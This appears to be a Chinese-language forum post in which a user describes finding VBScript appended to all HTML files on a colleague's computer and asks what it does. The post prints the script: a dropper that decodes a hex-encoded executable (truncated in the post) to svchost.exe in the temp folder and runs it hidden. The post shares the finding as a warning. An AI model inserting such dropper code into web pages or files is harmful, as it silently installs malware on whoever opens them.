事情是這樣子的
遠端幫同僚搞進銷存軟體 ,發現軟體打開不正常了
如圖
"在此頁上的ActiveX控件和本頁上的其它部分的互動可能不安全“
我選擇繼續,是
如下圖
“目前頁面腳本發生錯誤。%1不是有效的win32應用程式。”
這裡我要說一下的,IE浏覽器我都是設定過的,正常情況下進入這個頁面是不會有這兩個提示的
我覺得哪裡有存在某種問題或陰謀,我按提示路徑找到那個html檔案,發現如下
在html檔案尾部被添加了如下代碼
[Visual Basic] 純文字檢視 複制代碼
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000...........後面還有很多"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//-->
用文本記事本打開一串字元,打開會亂碼
這個代碼目的是什麼嗎?隻感染一個軟體 ?然後檢查所有的html檔案,
發現所有的html 網頁檔案全部被修改添加了 ,如圖
全盤的檔案無一幸免,我不懂程式設計,但知道這是VBS代碼,應該有一段時間了的,本地安裝了3X0全家桶的,但好像沒有阻止
現在正在挂了一個Win 10 ,用Windows Defender 安全中心掃描中
微軟自家産品還是可以的
論壇上也有類似的案例,前面我搜尋了一下2015年時候就有類似案例的VBS木馬(應該算木馬)
我這邊發文章,分享整個問題發現的過程
,從軟體打開異常,發現html網頁有問題,第一次發文章,來支援論壇
PS: 感覺國産防毒軟體(3X0,等不怎麼靠譜)